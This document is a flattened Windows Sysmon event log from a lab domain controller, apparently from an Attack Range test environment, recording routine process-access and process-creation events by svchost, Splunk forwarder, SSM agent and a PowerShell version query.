12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.656{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.612{266CAFBE-647F-6064-4F00-00000000AE01}32323220C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.415{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.414{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.413{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.412{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.412{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.412{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 